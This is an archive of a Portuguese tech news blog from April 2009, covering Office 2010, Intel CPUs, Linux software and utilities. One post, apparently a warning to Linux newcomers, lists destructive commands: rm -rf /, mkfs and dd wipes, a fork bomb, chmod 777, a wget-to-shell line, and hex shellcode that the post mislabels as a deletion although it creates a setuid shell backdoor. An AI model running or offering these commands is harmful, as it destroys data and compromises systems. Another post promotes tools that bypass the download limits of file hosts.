Byte News

Friday, April 17, 2009

Microsoft Office: O que vem por aí?


Esqueça do Office 14. Segundo fontes seguras de dentro da Microsoft, a nova versão do Office se chamará 2010. Nenhuma surpresa até aqui. A suíte de escritório sempre recebeu o ano de lançamento (ou o próximo dele) como nome - com exceção do Office XP. Além disso, segundo o próprio Steve Ballmer, o Office 2010 não será lançado esse ano.

O Office 14 2010 já está em desenvolvimento há algum tempo. Diferentemente do Windows 7, nenhuma build interna vazou até o momento. Apenas algumas screenshots e informações, nada mais.

Uma curiosidade é que, traumatizada com o Windows Vista e/ou por pura superstição, a divisão de astrologia da Microsoft decidiu que a versão 13 do Office “não existirá”. Ou seja, o número de versão do próximo lançamento do Office será o 14.

A maior novidade até o momento fica por conta de que a suíte Office suportará a plataforma de 64 bits. Não é um rumor, é uma tendência. Certamente um passo para o futuro, e melhor: confirmado. A versão de 32 bits continuará existindo, nada mais obvio, já que o Windows Vista/7 tem/terá versão nessa arquitetura.

Outro detalhe é que a 14ª versão do Office suportará o Windows XP. O sistema, apesar de já estar com um pé na cova, ainda é o mais utilizado mundialmente. E isso dificilmente mudará até 2010, mesmo com o lançamento do 7. Não fazê-lo compatível com o velho XP seria um tiro no pé.

Ficou com vontade testar o Office 2010? Segundo uma nota da Microsoft, você poderá fazer isso no terceiro trimestre desse ano, quando uma versão beta for liberada publicamente. Isso, é claro, se não vazar antes.

Mas enquanto tudo isso não chega, a última versão do Office disponível para os usuários finais, a 12 (aka 2007), ganhará uma grande atualização muito em breve. Trata-se do Service Pack 2, já confirmado para dia 28 desse mês no blog do time de desenvolvimento do Office. Bastante melhorias e novidades virão. O destaque fica para o suporte aos formatos OpenDocument (ODF), PDF e XPS, além de melhorias gerais e no calendário do Outlook e ferramenta de gráficos do Excel, entre muitas outras pequenas citadas no blog.

Openlanhouse disponível para instalação através do repositório Livre SO

Openlanhouse é um projeto desenvolvido por Wilson Pinto Júnior, com ajuda de colaboradores voluntários que tem como principal objetivo prover um completo e fácil Gerenciador de LAN Houses e Cyber Cafés. O Projeto é todo escrito em Python e Gtk, usando o "GNOME Human Guidelines", para uma interface intuitiva e de fácil uso.

Este pacote encontra-se disponível no repositório Livre SO, podendo ser instalado através do apt-get, nas distribuições baseadas no Debian Lenny.

Confiram no link: http://livre.wiki.br/debate/index.php?topic=280.0

Downloads sem limitações no RapidShare e MegaUpload

Se você quer fazer o download no RapidShare e MegaUpload sem limitações você precisa ter um conta Premium. Porém utilizando um gerador de links Premium para RapidShare e MegaUpload, você faz downloads como se fosse um usuário com conta Premium, sem tempo de espera, sem limitação e ainda pode fazer downloads simultâneos. Confira esses dois sites que geram links Premium para download no RapidShare e MegaUpload.

O procedimento é bem simples, basta acessar um dos sites abaixo, colar o link, então será gerado um novo link para download, sem limitações, no primeiro site você pode inclusive utilizar um gerenciador de downloads.

1. RsLinkGens

  • Gera 5 links Premium por dia.
  • Gera links para RapidShare(arquivos aé 200 MB) e MegaUpload (arquivos até 500 MB).
  • Suporta downloads simultâneos.
  • Suporte a gerenciador de downloads.

2. Very Rapidshare

  • Gera 3 links Premium por dia.
  • Gera links somente RapidShare.
  • Suporta downloads simultâneos.

Nota: Com o código de promoção, o limite de links por dia do VeryRapidShare sobe para 8.

Para pegar o código clique na opção “here” abaixo do botão download na página do VeryRapidShare, faça o download do arquivo de texto com o código da promoção e insira-o no campo correspondente.

Como procurar arquivos para download no RapidShare

  • Digite o termo que deseja procurar e tecle ENTER, no meu exemplo a série americana Lost.
  • Para copiar os links, clique em Exract Links, em um dos resultados de sua busca.
  • será aberta uma nova página com os links do RapidShare
  • Para baixar vários arquivos do Rapidshare automaticamente utilize o USDownloader.

    Nota: Apesar dessa informação não existir no site, acredito que a busca não seja diretamente nos servidores do RapidShare, ele procura nos sites da internet links do RapidShare, e retorna uma lista de sites que tem links do RapidShare ativos relevante a sua busca.

Alguns detalhes do Core i5 da Intel

Foram revelados novos pormenores sobre os próximos processadores da Intel, os Core i5, estão previstos para Outubro de 2009, depois de o seu lançamento ter sido adiado. Todos os modelos serão fabricados a partir do processo de 45nm e pertencem à família Lynnfield, esta que derivou da família Nehalem.

Os processadores Core i5 utilizarão um socket diferente dos seus irmãos mais velhos, os Core i7, o socket será o LGA 1156. Os processadores lançados serão todos Quad Cores e haverá 3 modelos diferentes, um com uma velocidade de 2.66GHz, outro com 2.80 GHz e ainda mais um com 2.99GHz de velocidade.

Estes novos processadores a que Intel chamou Core i5 trarão consigo a tecnologia TruboBoost que aumenta a potência dos processadores para 3.2GHz, 3.46 GHz e 3.6GHz quando é necessário. Os core i5 terão também a tecnologia HyperThreading que aumenta o numero de cores para o dobro, virtualmente.

A intel tem previsto lançar os processadores Core i5 em Outubro de 2009, por um preço de 196$, 284$ e 562$ consoante a velocidade dos processadores. Sobre o desempenho deste não há qualquer informação, mas se tivermos em conta o preço dos atuais Core i7 podemos ter uma noção do desempenho destes Core i5.

CoreFTP: lança nova versão


A equipe de desenvolvedores do CoreFTP liberou uma nova versão deste fabuloso cliente FTP: LE 2.1.1603. Se trata de um cliente rápido, leve e fácil de usar. Com ele você poderá gerenciar sem dificuldades suas transferências via ftp.

Faça download clicando aqui

Uma placa mãe AM3 compatível DDR2 e DDR3 da Jetway


A Jetway apresentou uma nova placa mãe batizada de HA08 COMBO, que permite migrar para a geração AM3 da AMD com suavizada e sem sacrificar os módulos DDR2.

Esta placa é baseada no chipset AMD 790GX e no seu southbridge SB750. Ela é compatível com os processadores para o socket AM2, AM2+ e AM3, e ela oferece, principalmente, dois slots de memória DDR2 (até 1066 MHz) e dois slots DDR3 até 1333 MHz, para garantir o dual channel nos dois casos.

Este modelo também oferece seis portas SATA-II com uma interface eSATA disponível. O áudio é garantido por um chip ALC888 da Realtek. O circuito gráfico integrado ao chipset 790GX, uma Radeon HD 3300 com 128MB DDR3 dedicado, permite a utilização do Hybrid CrossFire, com dois slots PCI-Express 16x para o CrossFireX. A placa oferece uma porta HDMI nativa, além de uma porta DVI-D e D-Sub.

Eis uma placa que nos permitirá passar para o Phenom AM3 sem maiores traumas, conservando os módulos DDR2, enquanto esperamos o preço das memórias DDR3 cair mais um pouco.

Intel Clarksfield : o novo quad core de 1,6 GHz ?

No último mês de novembro a Intel lançou o Nehalem, sua nova arquitetura. Seis meses depois, ela pode ser encontrada apenas nos processadores Core i7 "Bloomfield" para computadores desktop topo de linha. As máquinas da linha de entrada e os computadores portáteis precisam se contentar com o Core 2 Duo e Quad, na arquitetura Penryn. Felizmente, este panorama vai mudar até o final deste ano com o lançamento no terceiro trimestre dos Lynnfield e Clarksfield.

Lynnfield, a linha de processadores Nehalem para computadores desktop médios, deverá possuir três versões no seu lançamento: 2,66 Ghz, 2,8 GHz e 2,93 GHz. Todos possuindo quatro núcleos físicos, duplicados virtualmente através da tecnologia Hyperthreading e um total de 8MB de cache L3. Graças a função TurboBoost, alguns dos seus núcleos poderão ver a sua freqüência ser empurrada para 3,2 GHz, 3,46 GHz ou 3,6 GHz respectivamente dentro do limite do seu TDP de 95 W. Estes processadores custarão 196, 284 e 562 dólares.

Clarksfield, a família de CPUs para computadores portáteis nos reserva algumas surpresas. Segundo as informações publicadas no HKEPC, os novos quad cores serão lançados com as ridículas freqüências de: 1,6 GHz, 1,73 GHz e 2,0 GHz para o modelo "Extreme". Porque ridículas? Simplesmente porque a Intel recentemente oficializou o seu Core 2 Quad Mobile QX9300 com uma freqüência de... 2,53 GHz. A contrapartida positiva dessa pusilanimidade com a freqüência é que o TDP é bem razoável: 35 W. Também é preciso lembrar que o Clarksfield terá no socket uma CPU, o controlador de memória e um chip gráfico. Comparando com um Core 2 Quad, existe uma diferença de 5 a 10 Watts.

O maior Core 2 Quad mobile tem um TDP de 45 W! Portanto, nós só podemos ficar surpresos com o fato de que a Intel lançará uma nova arquitetura mantendo uma prudência quanto às freqüências, apesar de existir uma grande margem do ponto de vista da dissipação térmica. Como toda nova informação obriga, nós vamos ficar esperando uma confirmação destas informações. Os preços destes Clarksfield seriam 364, 546 e 1.054 dólares. Forumpcs

Crie capas e rótulos de CDs e DVDs com o Easy CD & DVD Cover Creator


Precisa elaborar uma capa de CD? Gravou um filme do evento em DVD e quer manter a filmoteca da empresa impecável? O Easy CD & DVD Cover Creator dá uma boa ajuda. Com sua interface simples, você não tem muitas dúvidas de como proceder. O programa permite a criação de capas para caixas de CDs e DVDs de dois tipos: tanto as de tamanho padrão como aquelas mais fininhas. Para quem não tem muita ideia do que fazer o programa oferece modelos prontos.
Mas a melhor saída é usar suas próprias imagens. Nesse caso, é possível usar uma única foto ou ilustração ou duas, uma para a parte frontal e outra para o verso da caixa. Depois é só escrever os textos da lombada e das outras duas áreas. Nesse ponto, no entanto, o programa peca pela falta de recursos. Se puder, acrescenta essas informações sobre a foto com a ajuda de outro programa gráfico.

Faça o downloada clicando aqui

Grupo libera RC 1 do Ubuntu 9.04


A comunidade responsável pela distribuição Ubuntu liberou para download a versão release candidate do Ubuntu 9.04.

De acordo com e-mail do desenvolvedor Stevenson Sanset, a versão está “completa e estável” para ser baixada por qualquer usuário. A versão final deve ficar disponível em apenas algumas semanas.

Segundo o Sanset, as principais mudanças estão na maior velocidade de boot do sistema e em otimizações para o uso de aplicativos que rodam remotamente, bem como arquivos hospedados na nuvem.

Parte da melhor performance é atribuída a nova versão do gnome e do servidor gráfico X.org 1.6, que agora inclui novos drivers.

O grupo vai liberar também uma versão chamada “Netbook Remix”, que otimiza as características da nova distribuição para funcionamento nos computadores ultracompactos, com menor poder de processamento e telas reduzidas. Info

Thursday, April 16, 2009

Synfig, software livre para animações 2D


Durante muito tempo o software de animação 2D foi dominado pelo software proprietário, havendo poucas e pobres alternativas em software aberto ou software livre. Mas eis que apareceu o Synfig, um brilhante e profissional software, primeiramente desenvolvido pela Voria, uma empresa de animação fundada pelo Robert Quattlebaum.

Em 2004 a Voria fechou portas mas Robert decidiu licenciar o Synfig sob a licença GNU GPL, e foi assim que a comunidade de software livre começou a desenvolve-lo e a usá-lo.

Embora haja outros programas no mundo do software livre que podem produzir animações 2D como o Ktoon ou Pencil através do tradicional "frame a frame", o Synfig de momento não tem programas concorrentes ao mesmo nível porque se baseia em primitivas vetoriais e na sua interpolação no tempo. Isto reduz drasticamente o trabalho na criação de animações profissionais já que se deixa de trabalhar de imagem em imagem, acabando com a necessidade de desenhar cada frame individualmente.

Mais pormenores e características podem ser consultadas na sua homepage. Tudo isto faz do Synfig uma grande aplicação embora ainda lhe falte alguns pormenores como o suporte a som ou salvar ou carregar "colour palettes". Há quem considere ou ache que a interface do Synfig seja um pouco esquisita até porque muitas das ações só se encontrem no menu de contexto do botão direito do mouse, mas uma vez percebido como funciona, podem confirmar que o Synfig é bastante eficiente

O Synfig está disponível para o Debian desde a versão Lenny e para o Ubuntu desde a versão Feisty. Está também disponível para outras distros de Linux e como é multiplataforma, encontram-se tambem instaladores para Windows, Mac e BSD. O seu código fonte está na página de downloads do Synfig.

Ubuntu Portável

Aqui vai mais uma novidade para os (ainda) indecisos no que toca a escolher algo estável e bom como o Linux.

Saiu há pouco algo que vos vai ajudar a mudar definitivamente (vejamos isto em termos de experimentação) para um sistema muito melhor: Portable Ubuntu.

Portable Ubuntu é um sistema, chamemos-lhe híbrido, que nos permite as funcionalidades do Ubuntu dentro do próprio windows. Isto é conseguido através de um kernel Linux modificado (coLinux) que permite assim uma execução nativa sem recurso a qualquer máquina virtual. Isto é conseguido fazendo uso dos serviços não só do coLinux mas também do servidor de ambiente XMing e do PulseAudio.

Assim, e sem ter que recorrer a qualquer tipo de instalação podemos usufruir da maior parte das capacidades do Ubuntu. Não estejam à espera de algo com uma performance excepcional (tentei num desktop com 512Mb de RAM e só abriu e executou qualquer coisa quase 25/30m depois de o mandar abrir).

Obtive muito melhores resultados no meu laptop (este já com 3Gb de RAM). No entanto e apesar desta lacuna de funcionamento, o sistema permite fazer quase tudo o que queremos fazer num Ubuntu "normal". O Aptitude não vem por omissão mas temos acesso ao apt-get.
Em termos de espaço o sistema ocupa uns meros 2Gb de espaço e este pode ser expandido através das instruções dadas na página do projecto.

Não precisa de qualquer instalação e basta executar o programa após o download (será feita uma descompressão dos arquivos) e em seguida ir à pasta respectiva e executar o "run_portable_ubuntu.bat" (arquivo batch).

Página do coLinux aqui...
do Portable Ubuntu aqui... (com as instruções necessárias para o que referi antes)

Zultrax, cliente peer-to-peer gratuito


Zultrax é um aplicativo para compartilhar arquivos de todo tipo na rede peer-to-peer você poderá buscar, descarregar e compartilhar arquivos usando a rede de Gnutella (a mesma rede utilizada pelo Limewire) e Zultrax.

Mouse 3D SpacePilot Pro para Artistas de Três Dimensões


O SpacePilot Pro é um mouse perfeito para quem trabalha com 3D ou CAD com uma tecnologia de navegação QuickView com teclas importantes como ESC, CTRL, ALT e SHIFT, teclas inteligentes com dupla função e o mais importante, a tela LCD Workflow Assistant que pode aumentar muito a produtividade dos usuários.

A navegação MCAD avançada do SpacePilot 3D usa botões com o sensor patenteado 6DoF (six-degrees-of-freedom) que podem ser pressionados em seis diferentes ângulos. Segundo a 3DConnection, o botão com sensor de pressão do SpacePilot Pro se torna uma extensão de você, e você pode controlar sua cena em 3D com total precisão, com um aumento de produtividade médio de até 21%. O formato ergonômico com suporte de pulso garante o conforto de quem precisa trabalhar horas e horas sem descanso.

O SpacePilot Pro custa US$ 499 (lá fora). Saiba mais sobre o SpacePilot PRO na 3Dconnexion.

Intel DG41MJ : o G41 numa Mini-ITX


O formato Mini-ITX está recebendo as honras da Intel com o lançamento do DG41MJ, uma placa mãe no formato baseada no chipset G41.

Mais simples do que as DG45FC e DQ45EK, esta placa mãe faz o impasse sobre as portas PCI-Express para não guardar mais do que uma clássica porta PCI. Compatível com os processadores socket LGA775 com um TDP inferior ou igual a 65 W, a DG41MJ possui dois conectores DDR2, para no máximo 8 GB de memória. Os controladores de vídeo (X4500), áudio 5.1 (Realtek ALC888VC) e Ethernet Gigabit estão disponíveis, enquanto que três portas SATA II, oito conectores USB 2.0, uma porta paralela e as saídas VGA e DVI também estão presentes. Enfim, não procurem conectores IDE, pois aqui isso não existe…

A DG41MJ da Intel já pode ser encontrada nos Estados Unidos por um preço inferior a 100 dólares.

Pequeno software facilita o redimensionamento de imagens

Um dos tipos mais comuns de edição realizadas em imagens por vários usuários é a de redimensioná-las, geralmente para reduzir o tamanho final do arquivo e facilitar o envio via correio eletrônico ou sites de relacionamentos. Existe um aplicativo bastante prático no desempenhar da referida função, substituindo os complicados softwares de edição.


O Image Resizer Powertoy Clone é um aplicativo que se integra ao sistema operacional e realiza a tarefa de redimensionar uma imagem de maneira bastante simples. Uma vez instalado, o usuário necessita apenas clicar com o botão direito do mouse na imagem e escolher a opção "Redimensionar imagens" (Resize pictures), uma nova tela é aberta oferecendo quatro opções de tamanhos, após escolher a opção desejada é só clicar no botão "OK".

O software é compatível com sistemas Windows, inclusive o Vista e os interessados podem efetuar o download clicando aqui.

Intel promete lançamento dos chips gráficos Larrabee até o começo de 2010

A Intel prometeu lançar o processador gráfico Larrabee, que deverá fazer com que a companhia rivalize com Nvidia e ATI no mercado de games de alta performance, até o começo do próximo ano, afirmou o Chief Executive Officer (CEO) da fabricante, Paul Otellini.

O Larrabee terá "introdução em volumes no começo do próximo ano", afirmou o executivo ao discutir os resultados financeiros do segundo trimestre com analistas financeiros.

A plataforma, segundo Otellini, "estará pronta, ou terá melhorias, no decorrer ano. O software também será finalizado este ano".

A Intel já domina os gráficos integrados, que são chips integrados à placa-mãe, populares em laptops e desktops corporativos, nos quais o poderio gráfico não é necessário.

O chip gráfico Larrabee será o primeiro que a Intel lançará para complementar placas gráficas que usuários compram separadamente e conectam ao PC.

A entrada da Intel em um setor lucrativo é simbólica também pela resistência que deverá impor às empresas ATI e Nvidia.

A Intel vem se esquivando para explicar quantos núcleos a Larrabee terá. As placas gráficas mais poderosas da Nvidia e ATI terão centenas de núcleos de processamento. É improvável que o Larrabee tenha tantos, já que conta com um chip x86 mais poderoso, usado também em processadores convencionais.

Segundo Otellini, o Larrabee terá múltiplas versões, com modelos mais baratos com menos núcleos. O executivo negou também que o desenvolvimento do Larrabee tenha enfrentado dificuldades pelo alto consumo de energia elétrica, já que exige mais resfriamento.

O executivo ainda não informou a data em que as primeiras placas gráficas Larrabee cheguem ao mercado.

Teclado Medigenic Infection-Control tem alarme de sujeira


Se você, algum dia, já se deu ao trabalho de tirar todas as teclas do teclado de seu micro e limpá-las, com certeza já pensou na imensidão de bactérias que estão confortavelmente alojadas nesse perímetro. Para prevenir possíveis doenças, o Medigenic Infection-Control Keyboard dá um drible nesses microorganismos e emite alertas sempre que sua área está em risco.

Vencendor do Medical Design Excellence Awards deste ano, o teclado foi criado especialmente para ambientes hospitalares (e maníacos por limpeza em geral), onde o contágio por esses bichinhos do mal é exponencialmente maior do que em outros locais de trabalho.

Para isso, ao invés das teclas convencionais, ele é equipado com uma superfície lisa para facilitar a limpeza - as 101 teclas foram desenhadas em 3D.

Em intervalos definidos, o Medigenic Infection-Control Keyboard emite alertas sonoros e visuais para lembrar o usuário de desinfetá-lo. Com dimensões de 46,2 por 17 por 3,4 centímetros, o dispositivo é feito em material hipoalergênico

Também ideal para quem tem severa mania de limpeza [ou Transtorno Obsessivo Compulsivo (TOC)], o Medigenic Infection-Control Keyboard sai pelo preço de 140 dólares. Info

Wednesday, April 15, 2009

20 Ótimas Ferramentas SEO

Para um começo em SEO, primeiramente é necessário avaliar algumas características do site. Avaliações que seriam: Meta-Tags, KeyWords, BackLinks etc.. Reuni então em uma lista com 20 ótimas ferramentas de SEO, onde você poderá analisar seu site, encontrar erros e muito mais.

  1. Analizador de Meta-Tags: Uma ótima ferramenta para você avaliar se suas KeyWords/Meta-Tags estão bem selecionadas e otimizada para os buscadores.
  2. Verificador de Velocidade da Página: Para um site ser bem otimizado, sua velocidade conta muito. Esse site mostra todos os arquivos carregados em sua página.
  3. Verificador de PageRank: Pagerank é uma das formas do Google avaliar seu site/blog, então essa ferramenta mostra qual seu pagerank.
  4. Gerador de SiteMap: Já falei inúmeras vezes aqui a importância de ter um sitemap de seu site, essa ferramenta cria o sitemap completo
  5. Pagerank Futuro: Este site avalia seu site e verifica qual será seu pagerank futuro, com uma porcentagem de acerto.
  6. Verificar BackLinks Yahoo: Verifique a quantidade e quais são seus backlinks ou links que apontam para sua página.
  7. PageRank em diferentes DataCenter: Como você sabe o Google tem vários datacenters ou centro de informação, com essa ferramenta você poderá o seu pagerank em diferentes datacenters.
  8. Posição nas Pesquisas Google: Verifique a posição exata em que seu site está colocado nas pesquisas do Google.
  9. Idade da Página: A idade de um blog/site também é importante, pois traz credibilidade. Com esta ferramenta você poderá checar a quanto tempo seu site está no ar.
  10. Gerador de Meta-Tags Avançado: Com esta ferramente você poderá gerar meta-tags para seu site/blog.
  11. Posição nas Pesquisas Yahoo!: Da mesma forma que no Google, verifique a posição exata de seu blog nas pesquisas do Yahoo.
  12. Verificador de BackLinks: Veja todos seus BackLinks, detalhados de página por página.
  13. Verificador de Página Banida Google: Verifique se sua página foi banida por algum motivo no Google.
  14. CopyScape: Verifique se alguem está copiando seu conteúdo.
  15. FireFox SEO: Uma ferramenta completa de SEO em seu browser. É um simples plugin que você instala e pode gerar relatórios de sites no momento.
  16. Densidade de Palavras-Chave: Verifique a densidade das palavras-chave em seu blog.
  17. Verificador de Quantidade de Pesquisa de palavras-chave: Veja a quantidade de visitas em que uma palavra é pesquisada no Google e se for o caso, o preço do anúncio no adwords.
  18. Verificador de Páginas não Existentes: Muitas vezes por descuido, acabos por esquecer algumas páginas, então essa ferramente verifica quais páginas estão inexistentes.
  19. Guia Prático de SEO feito pelo Google: Uma apresentação em PDF, que foi criada pelo Google para ensinar o básico de SEO aos novatos.
  20. Verifique BlackHat em site: Muitas pessoas são punidas no Google e não sabem porque. Essa ferramenta verifica algumas técnicas de BlackHat ou ações que você não deve fazer.

Analise arquivos suspeitos em vários mecanismos de antivírus


VirusTotal é um serviço online gratuito que analisa arquivos suspeitos e proporciona uma rápida detecção de vírus, worms, cavalos de tróia, e todos os tipos de arquivos maliciosos detectados por vários mecanismos de antivírus como o Avast, AVG, Avira, NOD32, F-Secure, Kaspersky, McAfee, Panda Security, BitDefender, Symantec, Trend Micro, etc.

VirusTotal é um serviço desenvolvido pela Hispasec Sistemas, um laboratório independente de segurança em Tecnologia da Informação, que utiliza versões em linha de comando de vários antivírus, atualizados regularmente com assinaturas oficiais publicadas por seus respectivos desenvolvedores.

O serviço usa múltiplos mecanismos de antivírus com atualizações de assinaturas de antivírus em tempo real e apresenta resultados detalhados de cada mecanismo.

Nota: VirusTotal não substitui qualquer antivírus instalado em seu computador, já que apenas os arquivos submetidos são analisados e apesar da taxa de detecção proporcionada pelo uso de múltiplos mecanismos de antivírus ser muito superior àquela oferecida por um único produto, os resultados não garantem que um arquivo seja inofensivo.

Gerencie suas configurações de rede com o NetSetMan


Se você frequentemente precisa conectar seu laptop ou computador em diferentes redes, sabe como é cansativo ficar trocando as configurações de rede sempre que precisa conectar seu computador a outra rede.

Para alterar rapidamente suas configurações de rede, você pode utilizar o programa NetSetMan, um gerenciador de configurações de rede, que permite criar até 6 perfis diferentes de configuração de rede que podem ser alternados rapidamente.

NetSetMan tem uma interface fácil de usar que permite gerenciar todas as suas configurações de rede rapidamente. Você pode criar até 6 perfis de rede com endereço IP, máscara de subrede, gateway padrão, servidor DNS e muito mais.

Cada configuração de rede é armazenada em uma aba separada. Para altenar entre as diferentes configurações de rede, você seleciona a configuração desejada e clica em “Activate” para ativar a configuração de rede escolhida.

NetSetMan é gratuito para uso pessoal e funciona perfeitamente no Windows 2000, XP, 2003 e Vista. Além disso pode ser executado como uma aplicação portátil, bastando para isso escolher a opção “Extract files” durante a instalação do programa. Se preferir fazer a instalação, escolha a opção “Standard Installation”.

Veja o que você pode configurar no NetSetMan

  • Endereço IP
  • Máscara
  • Gateway padrão
  • Servidor DNS
  • Servidor WINS
  • Nome do Computador
  • Grupo de trabalho
  • DNS Domain
  • Impressora Padrão
  • Drives de rede
  • NIC Status
  • Servidor SMTP
  • Arquivo Hosts
  • Scripts (MTD, VS, JS, …)
Download NetSetMan

Sony confirma lançamento de Walkman equipado com tela OLED

Uma série de rumores circularam pela Web referentes ao lançamento do Sony Walkman equipado com telas de vídeo usando a recente tecnologia OLED, inclusive prováveis datas de lançamento foram apontadas pela Amazon.com. Depois de muitas informações desencontradas, a fabricante japonesa anuncia dia e preços de lançamento do aparelho.

A data para a chegada do produto ao mercado japonês é 25 de abril, conta o site nipônico Impress Watch. Segundo ele, a gigante dos eletrônicos forneceu também as especificações dos aparelhos, que devem vir nas cores preto e vermelho somente. Serão dois modelos, o NW-X1060 com 32GB de capacidade e o NW-X1050 com 16GB, os quais devem custar US$500 e US$400, respectivamente.

A novidade do dispositivo, contudo, fica pela utilização da tecnologia OLED em suas telas de vídeo, sucessora do LCD, a qual promete diminuir extremamente a quantidade de energia necessária para exibir uma imagem. Os displays são formados por diodos orgânicos emissores de luz (daí o nome OLEDOrganic Light Emitting Diode). Como são capazes de gerar sua própria luz, eliminam a necessidade de iluminação de fundo. Nos LCDs (Liquid Crystal Displays ou telas de cristal líquido, na tradução), é necessário iluminar a parte de trás da tela, porque o cristal apenas “tapa” essa claridade para gerar os pontos escuros numa imagem.

As telas produzidas com tecnologia OLED também são mais finas que as convencionais e mais baratas. Em alguns casos, como na reprodução de cores escuras, o OLED também apresenta melhor qualidade de imagem.

Além de músicas no formato MP3/HE-AAC/AAC/WMA / Linear PCM / ATRAC / ATRAC Advanced Lossless, o exemplar do novo segmento da série Walkman suporta vídeos no formato MPEG-4 AVC/H.264 e MPEG-4 e WMV. Há ainda um receptor de TV.

Já para o mercado americano ou europeu não há previsão de chegada do novo tocador de músicas da Sony, muito menos para o Brasil. Acredita-se que, mesmo que venha, não será para breve, finaliza o Engadget.

Imagens do Sony Walkman equipado com OLED podem ser vistas em tinyurl.com/cs2ts2.

Apague todos os rastos do seu disco rígido com o Darik’s Boot and Nuke


O Darik’s Boot and Nuke é um boot disk que permite ao utilizador limpar/apagar em segurança toda os dados contidos no disco rigido. Com o DBAN pode apagar TODOS os dados num disco rígido em segurança, isto pode-lhe fazer falta no caso de querer vender o seu disco rígido, ou de apagar qualquer rasto de alguma actividade anteriormente feita no disco em causa.

O Darik’s Boot and Nuke limpa de uma forma tão completa um disco rígido que o mesmo não dará resultados algum quando inspecionado por “forensic detectives”.
Começe a usar o DBAN por forma a limpar completamente o seu disco.

1. Faça o download do ISO do DBAN e grave-o para um CD. Se estiver com problemas em gravar o ISO para CD siga este tutorial.

2. Após gravado o CD, trate de dar prioridade do boot á partir do CD.

3. Insira o CD, e inicie o computador.

4. Quando o DBAN terminar o seu serviço será mostrada uma mensagem: “DBAN Succeeded“. E o seu disco estará pronto para outra!

7 comandos mortais em Linux

Se for um novato na área do Linux, existe a possibilidade de alguma vez encontrar um usuário mal intencionado num fórum de ajuda para Linux que lhe dê uma falsa ajuda passando-lhe comandos que você vai digitando sem saber para que servem, comandos esses que podem ser fatais para qualquer sistema.

A pensar nisso deixo aqui 7 comandos que podem acabar com a saúde de qualquer sistema.

1.
rm -rf /

Este comando irá eliminar recursivamente toda a informação do directório root.

2.
char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Esta é a forma encontrada para fazer o mesmo que o primeiro comando mas de uma forma mais discreta, até mesmo usuários mais ambientados a sistemas Linux podem não reconhecer o comando.
3.
mkfs.ext3 /dev/sda

Este comando irá reformatar ou eliminar toda a informação contida no dispositivo indicado após o comando mkfs.

4.
:(){ :|:& };:

Comando conhecido como “forkbomb”. Este comando indica ao sistema que execute o maior numero possível de processos até que o mesmo crash. Este comando pode causar danos ao corromper informação.

5.
chmod -R 777 /

Este comando dá a todos os utilizadores e ficheiros os privilégios de “Read, Write, Execute”. Somente os ficheiros em /bin e /etc/bin não sofrerão essa alteração por estarem a correr e não ser possível a alteração.

6.
wget http://um_codigo_fonte_malicioso -O- | sh

Este comando fará o download e executará um código malicioso na sua máquina, o que pode fazer estragos de todos os tipos.

7.
dd if=/dev/zero of=/dev/sda

Ao executar este comando o seu disco será formatado tal como veio de fábrica.

Celeron 11 anos


Há 11 anos, em 1998, a Intel anunciou o Celeron. O processador de entrada de linha, destinado as máquinas mais baratas, foi muito criticado no seu lançamento: o primeiro modelo (Convington) tinha uma performance vergonhosa — assim como todos os Celeron.

Para simplificar, a Intel utilizou um chip Pentium II (Deschutes, gravado em 250 nm) sem acrescentar o cache de nível 2 (o Pentium II tinha 512 KB de cache colocado sobre um cartucho Slot 1). Evidentemente, a performance do Celeron era muito baixa, pois a memória cache é muito importante dentro de uma CPU moderna. O Convington foi apresentado em duas versões: 266 e 300 MHz, mas ele foi rapidamente substituído pelo Celeron Mendocino (ou Celeron « A », pelo menos quando duas freqüências idênticas coabitavam).

Este chip manteve o mesmo processo de gravação, mas ele foi integrado por um cache de 128 KB ligado diretamente a CPU. Um ponto interessante: o cache tinha a mesma freqüência da CPU (contra a metade de freqüência de um Pentium II) e um Celeron 300 « A » praticamente lutava com as mesmas armas contra um Pentium II 300 graças a sua memória cache mais rápida (mas muito menor). Além disso, este processador overclocava muito facilmente: a maioria dos modelos passavam de 300 a 450 MHz simplesmente mudando o FSB de 66 MHz para 100 MHz.

Desde então a família Celeron cresceu muito e a Intel vem oferecendo uma versão portando este nome na maioria das suas arquiteturas, normalmente com menos memória cache e um FSB mais lento do que as versões comuns do processador.

Uma HD4890 totalmente modificada da Asus


Uma semana antes do lançamento da nova placa gráfica da AMD, nós descobrimos as primeiras imagens da ATI Radeon HD 4890 original da ASUS. Hoje, nós aprendemos um pouco mais. A presence do condensador Fujitsu SuperML foi confirmada. Ele melhora a efici~encia e permite uma corrente « mais limpa ». Isso teria permitido a ASUS reduzir a tensão dos circuitos em 20 % (de 143 mV para 114 mV). Assim como as outras melhorias que dizem respeito à alimentação, isso deverá ajudar no overclocking. Com o aumento da eficiência, nós também podemos esperar por uma liberação de calor mais moderada.

Para dissipar este calor, a ASUS apostou num novo cooler especialmente desenhado para esta placa. Aqui nós descobrimos uma base de cobre monstruosa e seis heatpipes de 230 mm que enviam o calor para as aletas de alumínio. Duas ventoinhas finalizam o trabalho. Estranhamente a temperatura não baixou mais do que 10 °C em relação ao cooler de referência. Isso parece muito pouco quando comparamos este cooler com os modelos da concorrência (que são anunciados com baixas superiores). Este número deve levar em conta o overclock da placa, apesar da companhia ainda não ter divulgado suas freqüências finais.

15 excelentes portais de download para produtos da Microsoft

Para quem não sabe, a Microsoft mantém vários repositórios públicos de downloads na internet. Muitos desses sites oferecem downloads para um determinado grupo de usuários, outros são acessíveis a partir de produtos da Microsoft e outros livremente para todos. O benefício de uma lista de sites deste tipo é que você não possui apenas links para downloads de produtos da Microsoft como também patches, atualizações de softwares beta e até mesmo protótipos de softwares que podem estar disponíveis apenas por um certo período de tempo.

Na lista a seguir vamos resumir as principais fontes de download de produtos da Microsoft, espero que lhe seja útil, confira:

  • Codeplex: Portal para download de softwares open source.
